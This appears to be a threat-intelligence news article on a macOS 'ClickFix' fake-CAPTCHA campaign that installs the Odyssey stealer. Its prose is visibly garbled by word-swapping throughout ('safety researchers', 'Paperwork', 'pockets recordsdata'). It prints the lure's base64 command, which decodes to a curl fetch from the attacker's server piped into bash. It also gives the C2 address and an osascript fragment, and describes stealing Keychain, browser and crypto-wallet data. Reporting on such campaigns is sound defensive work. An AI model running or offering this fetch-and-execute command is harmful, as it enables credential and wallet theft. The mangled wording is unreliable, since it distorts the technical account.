In current months, safety researchers have noticed a novel phishing marketing campaign focusing on macOS customers beneath the guise of a CAPTCHA verification course of.
This assault, dubbed “ClickFix,” leverages a mix of social engineering and working system detection to coax victims into executing malicious instructions straight of their terminals.
By mimicking professional Cloudflare-style checks, the malware avoids dropping conventional binaries, as an alternative counting on base64-encoded scripts that fetch and run an obfuscated AppleScript payload.
Initially, unsuspecting customers navigating to a compromised URL—typically impersonating in style buying and selling platforms—are offered with a human verification web page tailor-made to their working system.
Home windows guests obtain innocuous PowerShell directions, whereas macOS customers are instructed to open Terminal, paste a copied command, and press Return.
macOS directions (Supply – Forcepoint)
Forcepoint analysts recognized that this refined divergence in directions is designed to trick macOS victims into executing a command that decodes and pipes a base64 string into bash:-
echo “Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXN0ICY=”
| base64 -d | bash
As soon as the command runs, it installs an obfuscated AppleScript compiled file (.scpt) that carries out the core information harvesting actions. The script begins by creating a singular momentary listing beneath /tmp, utilizing osascript calls to assemble and execute instructions:
osascript -e ‘run script “on mkdir(merchandise)ntrynset filePath to quoted type of (POSIX path of merchandise)ndo shell script “mkdir -p ” & filePathnend trynend mkdir”‘
Forcepoint researchers famous that, after listing setup, the malware scans the person’s Desktop, Paperwork, and Library folders for recordsdata with extensions akin to .pdf, .docx, .key, and browser-specific artifacts together with Keychain databases, Safari cookies, and Apple Notes databases.
Starting of script & creating listing (Supply – Forcepoint)
The script proceeds to enumerate profiles in Firefox and Chromium-based browsers, copying saved credentials, cookies, type historical past, and encrypted pockets recordsdata for recognized crypto extensions like MetaMask and Exodus.
An infection Mechanism Deep Dive
The an infection mechanism hinges on the guide execution of a seemingly benign “verification” command. By using base64 encoding, the attackers obscure the payload’s true goal, bypassing signature-based detection.
When decoded, the payload fetches a extremely obfuscated AppleScript from a distant server (hxxp://45.146.130[.]131/d/vipx14350). This AppleScript employs random string obfuscation and nested osascript invocations to hinder static evaluation.
Upon execution, it prompts the person for his or her password to escalate privileges after which collects system profile particulars by way of:-
system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType
The harvested information, together with gathered recordsdata, is archived into /tmp/out.zip and exfiltrated to the attacker’s C2 endpoint at 45.146.130.131/log.
A cleanup routine then removes the momentary listing to erase traces, complicating forensic restoration.
Odyssey stealer login web page (Supply – Forcepoint)
By combining acquainted CAPTCHA prompts with terminal-based social engineering, the ClickFix malware Odyssey stealer demonstrates a classy evasion approach that sidesteps conventional antivirus options, emphasizing the necessity for heightened person consciousness and multi-layered endpoint controls.
Equip your SOC with full entry to the newest menace information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial
